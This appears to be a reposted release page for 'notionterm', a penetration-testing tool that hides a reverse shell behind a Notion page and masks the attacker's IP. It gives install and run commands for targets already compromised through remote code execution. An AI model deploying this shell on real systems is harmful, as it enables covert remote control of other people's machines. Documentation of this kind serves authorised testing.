notionterm v1.0.1 releases: Embed reverse shell in Notion pages

Notion pages reverse shell

notionterm – Embed reverse shell in Notion pages

Notion pages reverse shell

FOR ➕:

  • Hiding attacker IP in a reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
  • Demo
  • Quick proof insertion within the report
  • High available and shareable reverse shell (desktop, browser, mobile)
  • Encrypted and authenticated remote shell

NOT FOR ➖:

  • Long and interactive shell session (see tacos for that)

Why? 🤔

The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal

How

Just use notion as usual and launch notionterm on target.

Changelog v1.0.1

Helper script to ease usage and launching (without having to remember flag etc)

  • wrap-notionterm.sh

Install

Requirements 🖊️

  • Notion software and API key
  • Allowed HTTP communication between the target and notion domain
  • Prior RCE on target

From release: curl -lO -L https://github.com/ariary/notionterm/releases/latest/download/notionterm && chmod +x notionterm

Quickstart

Set-up

  1. Create the “reverse shell” page in Notion: Page template
  2. Give the permissions to notionterm to access the page (with the notion api key)

Run (details)

  1. Start notionterm
  2. Activate the reverse shell (with the button ON )
  3. do your reverse shell stuff
  4. Shutdown the reverse shell (OFF)

👟 Run

# On target with prior RCE
./notionterm

Configuration can be made using:

  • Flags
  • Configuration table in notion page

Server mode

To quickly obtain terminal in any notion page you can use the server mode (Requirement: integration w/ write access to the page)

First, Launch notionterm on target with server mode enable:

notionterm -serve [flags]

Then, when/where you want to get a terminal in your notion page create an embed block with url containing the page id (to get it)CTRL+L: https://[TARGET_URL]/notionterm?url=[PAGE_ID].

Wait…

And that’s all!

Outgoing mode

+: only target -> notion page flux (.i.e No need to have a HTTP server reachable on target)

notionterm -outgoing [flags]

Launch notionterm and immediately request notion page to retrieve command to execute (do not wait for the button to be clicked).

Copyright (C) 2022 ariary 

Source: https://github.com/ariary/